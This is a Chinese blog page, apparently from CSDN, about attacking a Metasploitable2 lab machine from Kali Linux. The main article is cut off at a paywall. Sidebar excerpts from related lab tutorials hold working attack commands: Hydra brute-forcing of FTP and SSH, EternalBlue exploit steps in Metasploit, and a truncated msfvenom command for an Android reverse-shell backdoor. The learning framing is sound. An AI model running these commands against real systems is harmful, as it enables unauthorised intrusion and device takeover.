利用kali机对metaploitable做渗透攻击

最新推荐文章于 2025-08-04 09:58:06 发布
原创 最新推荐文章于 2025-08-04 09:58:06 发布 · 2.3k 阅读 · 24 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #vmware #kali linux #渗透测试 #安全

本文仅作学习参考使用

一、虚拟机&&靶机的准备

1)kali linux的安装

https://www.kali.org/get-kali/#kali-virtual-machines

2)Vmware虚拟机的安装

3)靶机metaploitable2的安装

下载地址:https://sourceforge.net.projects/metasploitable/

(如果虚拟机的安装教程请参考其他文章,如果kali linux的安装出现问题,可以私信或留言博主,我发已经调试好的kali linux给大家。需要靶机的安装包同样也可以私信或者留言)

 

二、使用kali机完成对第三方靶机Matesploitable的渗透攻

最低0.47元/天 解锁文章
kali渗透metasploitable
浮生若梦的专栏
11-16 2万+
扫描阶段: 工具:Nmap 隐蔽扫描      nmap  -sS 192.168.8.135 端口爆破:FTP、SSH等 工具:Hydra 备用字典 爆破FTP hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135 爆破SSH
CFS三层靶渗透_Kali
qq_42383069的博客
03-18 6042
环境搭建 0x01. 环境下载: 【CFS三层靶环境】百度网盘链接: 链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg 提取码: dkcp 解压密码:teamssix.com 0x02. 环境搭建: 1)设置虚拟网卡(新建两个仅主模式的网卡) VMnet10: 子网IP:192.168.22.0 子网掩码:255.255.255.0 VMnet11: 子网IP:192.168.33.0 子网掩码:255.255.255.0 2)虚
metasploitable2安装包
最新发布
wzbb151613911的博客
08-04 375
链接:https://pan.baidu.com/s/1DhxY3lHvByecYMu4JcTOmw。【超级会员V1】通过百度网盘分享的文件:metasplo…
手把手教你kali渗透Metasploitable
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
渗透Metasploitable
sGanYu
09-06 3234
攻击kaliMetasploitable2(一个特制的ubuntu操作系统,设计初衷作为安全工具测试和演示常见漏洞攻击的环境,默认开放高危端口如21、22、23、445、6000等等,而且具有很多未打补丁的高危漏洞) Metasploitable2漏洞:弱口令漏洞(如vnc、mysql、PostgreSQL等)、Samba MS-RPC Shell命令注入漏洞 、Vsftpd漏洞、Linux NFS共享目录配置漏洞、Tomcat管理台默认口令漏洞、root用户弱口令漏洞(SSH爆破) .
kali使用msf渗透测试
qq_53175607的博客
11-18 1467
kali利用metasploit使用ms17-010(永恒之蓝)渗透windones7 免责声明:只用于靶测试 1.渗透之前要关闭windones7和主的防火墙及杀毒软件。 2.使用nmap扫描windones7 3.445端口开放,说明有ms17-010的漏洞。 4.使用命令msfconsole打开msf 5.使用search ms17-010命令查找攻击模块 6.使用exploit/windows/smb/ms17_010_eternalblue模块攻击 use选择 7.show options
Kali 下对安卓手攻击
m0_66524548的博客
01-29 1万+
写在前面:本文仅限学术交流,请勿用他人实践 Kali对安卓手攻击渗透) 我们首先需要确定本IP 这很简单,对于Kali来说我们需要打开终端并键入 ifconfig 即可获取自己的IP,然后我们需要确定安卓手也就是被攻击者的IP,只需键入 fping -g 本IP地址/24 这时我们就能确定目标IP,这次教程主要围绕创建后门程序展开 在终端中执行: # msfvenom -p android/meterpreter/reverse_tcp LHOST=目标IP LPORT=
Kali利用MSF渗透安卓手_kali入侵安卓手(1)
2401_84519960的博客
05-01 2137
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
kali使用Metasploit进行渗透攻击实验
ysm_zxc的博客
06-13 1061
信息安全技术
kali渗透测试——渗透攻击(基础+攻击永恒之蓝操作系统)
2302_80189643的博客
05-29 543
使用auxiliary/scanner/smb/smb_ms17_010模块加载检测,set rhosts设置目标主,run执行,search搜索ms17_010漏洞的渗透模块。使用编号为0的模块,加上use启动模块,然后使用show options命令查看这个模块需要设置的参数。(4)Check是检查,表示该漏洞利用模块是否包含检测功能,用于验证目标系统是否存在该漏洞。(5)Description是描述,对漏洞利用模块的功能、目标、影响等信息简要描述。(2)模块命令(Module Command)
攻击和靶的使用说明:kali linux和OWAS详细使用教程.pdf
04-14
攻击和靶的使用说明:kali linux和OWAS详细使用教程 网卡的详细配置 ## WEB服务器OWASP靶 ### 下载地址:https://sourceforge.net/projects/owaspbwa/files/ ### web apps: http://192.168.0.113/ #### phpmyadmin: http://192.168.0.113/phpmyadmin ### username: root password: owaspbwa
[渗透测试][Kali]对DC-6靶进行渗透测试
多皮哦的博客
07-18 2719
对DC-6靶进行渗透测试 本例使用的工具主要有:wpscan,BurpSuite,nc(瑞士军刀) 1. 搭建渗透平台 Kali 2018, DC-6靶, VMWare虚拟平台 DC-6靶渗透需要用到DC作者在https://www.vulnhub.com/entry/dc-6,315/给出的提示 发现主这个步骤省略 2. 枚举用户名 站点使用了wordpress,考虑使用wps...
kali渗透综合靶(二)--bulldog靶
W小哥
03-07 1260
一、靶下载 靶下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 二、bulldog靶搭建 靶: 将下载好的靶环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主模式 kali攻击: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox...
通过metasploit工具渗透Metasploitable 2靶
热门推荐
朝歌
04-24 1万+
    首先,是Metasploitable 2的在本地的安装,    下载地址:https://sourceforge.net/projects/metasploitable/?source=typ_redirect。下载过后解压。会有四个文件。            用VM打开.vmsd文件。如果遇见需要配置文件什么的,就用VM打开vmx文件。        就会显示下面:打开虚拟账号密码都...
kali linuxMetasploitable2漏洞利用,ProFTPD爆力破解 笔记
边城浪子的博客
09-19 617
ProFTPD:一个Unix平台上或是类Unix平台上(如Linux, FreeBSD等)的FTP服务器程序 http://www.proftpd.org/ 实验环境: 攻击kali linux ip:192.168.172.134 目标:Metasploittable2 ip:192.168.172.129 攻击过程: step1:探测 nmap -sV -p2121 192...
Kali网络渗透测试实验三——XSS和SQL注入
qq_45746876的博客
11-24 4481
XSS和SQL注入前言实验目的系统环境:Kali Linux 2、Windows ServerXSS部分:利用Beef劫持被攻击者客户端浏览器实验环境搭建1.利用AWVS扫描留言簿网站,发现其存在XSS漏洞2.Kali使用beef生成恶意代码3.访问http://留言簿网站,将恶意代码写入网站留言板4.管理员登录login.htm,账号密码均为admin,审核用户留言5.回答问题SQL注入部分:DVWA+SQLmap+Mysql注入实战sqlmap语法参考1.注入点发现2.枚举当前使用的数据库名称和用户名3
Kali渗透全方位实战】Metasploitable2系统介绍
NJU phd 在读。
04-25 1879
文章目录1 Metasploitable2使用指南2 服务3 易受攻击的web服务3.1 易受攻击的web服务:Mutillidae3.2 易被攻击的web服务:DVWA 1 Metasploitable2使用指南 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用安全漏洞。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值